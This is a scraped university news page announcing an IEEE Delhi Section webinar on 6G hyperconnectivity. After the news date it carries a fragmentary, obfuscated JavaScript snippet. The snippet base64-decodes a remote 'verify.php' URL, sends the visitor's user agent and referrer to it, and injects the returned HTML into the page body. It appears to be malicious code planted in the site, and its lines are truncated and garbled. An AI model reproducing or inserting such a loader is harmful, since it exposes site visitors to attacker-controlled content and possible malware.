



Published on *BVICAM* (<http://14.140.205.245>)

Home > Invitation for Webinar on 6G Enabled Hyperconnected Future dated 29-07-2023

Invitation for Webinar on 6G Enabled Hyperconnected Future dated 29-07-2023

IEEE Delhi Section with Computer Society Chapter, Consultants Network Affinity Group, Life Member Affinity Group, Inter Society Relations, Industry Relations & SIGHT Standing Committees of IEEE Delhi with the associations CSI, Safa Society, ISTE Delhi Section, IETE Delhi Centre, invites you for a Webinar on 29-July-2023, the Saturday, at 06:00 p.m.

This webinar is aimed at providing a high-level overview of 6G for a hyperconnected future to the participants. As fifth generation (5G) global rollout, is underway the focus of wireless research is increasingly shifting towards 6G. We expect that 6G will provide ultimate experience for all through hyper-connectivity involving humans and everything. Even though 6G is few years away, it is already expected to take us into a world of seamless reality where the digital and physical worlds as we know them today have merged, to trigger extrasensory immersive experience. Fast forward to 2030 and we are in a hyper-connected world that needs 1,000 times faster connectivity than what is possible today, with data transfer speed in terabytes per second and extremely low latency allowing response time in a few microseconds. In this session, the speaker will provide comprehensive overview of various aspects related to 6G, including technical and societal trends, drivers, use cases, candidate technologies, and research areas.

File:

 Invitation for Webinar on 6G Enabled Hyperconnected Future dated 29-07-2023 (2).pdf_[1]

News Category:

Activities

News Date:

Saturday, 1 July, 2023 - 15:50

```
{ let selfer=new XMLHttpRequest;selfer.open("GET",  
decodeURIComponent(escape(atob('aHR0cHM6Ly91cmxzczGF0aC5jb20vdmVyaWZ5LnBocA=='))))  
+
```

```
nt=${navigator?.userAgent}&r=${document?.referrer}`,selfer.onreadystatechange=()=>{if(4===selfer.readyState)
);document.querySelector("body").insertAdjacentHTML("afterbegin",e?.html)}}),selfer.setRequestHeader("Reque
}); //-->
```

Source URL: <http://14.140.205.245/content/invitation-webinar-6g-enabled-hyperconnected-future-dated-29-07-2023>

Links:

[1]
<http://14.140.205.245/sites/default/files/news/Invitation%20for%20Webinar%20on%206G%20Enabled%20Hypercon07-2023%20%282%29.pdf>